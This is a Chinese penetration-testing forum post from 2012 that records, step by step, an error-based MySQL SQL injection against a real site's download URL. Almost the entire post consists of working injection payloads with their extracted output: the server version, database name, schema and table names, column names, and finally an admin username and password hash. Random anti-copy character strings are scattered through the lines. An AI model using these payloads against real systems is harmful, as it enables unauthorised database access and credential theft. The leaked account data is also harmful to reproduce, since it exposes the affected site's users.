中国网络渗透测试联盟

标题: php+mysql高级爆错注入经测算有效 [打印本页]
作者: admin    时间: 2012-9-13 17:52
标题: php+mysql高级爆错注入经测算有效
http://www.wooyun.org/bugs/wooyun-2010-016666 Y' K* x2 [8 Y5 y2 A! o

) \; {" _$ Y3 f' ]2 e7 I- b+ |之前想找个测试 没想到这有 可以测试下做个记录而已 4 f9 }0 J5 x, Y0 V
# c+ n2 y8 z6 Y  g& Q
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
$ a4 A/ F- r- v3 k1 a+ U& V- O4 W+ u$ a/ ~- B: o2 a1 D
/data0/htdocs/leqi_new/app/myapp.php5 ~3 a5 u/ J6 y7 {1 {

/ Y+ d2 U' Q6 V. e 或者# J; B9 H' y) g5 f! A
3 n0 M* K1 t# {" ?( z
/**********version()**********/ 5.1.49-log
; u( C# j' J! |# jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
1 L( w1 \4 i  `4 p$ G1 J3 M1 a0 K' ^( @9 j; F; T7 m
/**********user()**********/  ; t! ^$ x) |7 ~5 ^5 Z" S
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/ C( T" H8 |3 T1 k# g( i: p) d$ U4 _5 A8 P' U" |4 X5 `
/**********database()**********/  leqi
4 j0 l- I' a, ahttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0035 j& D! [, `. _! q3 d+ `2 w3 D! Z

3 w( j7 W; G) e# i: I/**********limit依次递归爆库**********/  I- x2 I  @$ U, m( u3 B$ ~
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003  Z/ X: I( C9 l5 h! u' S7 f
information_schema
  I% K& d' S' }- ?8 l% ghttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003  P$ S5 Z6 c' g0 q2 G
leqi
  i; {% Z6 c/ n( W5 g6 R  ^# Khttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 x% m/ e, ]& o6 j/ p0 I8 ?! ytest
+ l/ g6 |& s, L+ r+ G8 P  U+ L. z3 c
/ ?8 a* b; t! v/**********limit依次递归爆表名**********/
3 e7 k6 e& g6 Y7 x7 a1 G8 y8 y2 D6 Phttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 y' A- z0 ^+ ?  ]% @  I0 d+ Husers7 Z1 \6 q. d0 Z" X
7 g( M! p6 v2 W3 f0 @) A
/**********limit依次递归爆字段名**********/. B0 T! Y: u0 u' \% T
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 ~+ E4 P/ Q9 Y0 Z. f* tuser_id,username,nickname,passwd,group_id% a' w' y" P7 Y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
' ~% {1 ?! x* a3 s9 z/wapc/5000_0005_003
6 l( c4 e, j7 D9 R' F2 ?0 {11 21; K* b, X; w" z
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
3 u+ p" Z' N- j" t1 J( b0 i/wapc/5000_0005_003
+ m& ]1 N2 _$ o  c' j+ d# }3 q, a11 341 351 361+ o/ ~1 O' Z/ h$ C* J
/**********爆数据**********/1 k* k! M4 b; B) W
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
5 `- N: C2 W  I1 Y1 @9 ~( Sadmin; F  b- F3 `, c, ?
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
. V  e' s$ w3 @$ O7 ^0 \! I- ?* K6a8b4574ca231eb8bd52764d4978ffcd
+ Z* D0 c) }# l$ t( B* `2 B* A& r: @( Y0 Y5 v# X
* T0 m, F6 E! m




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2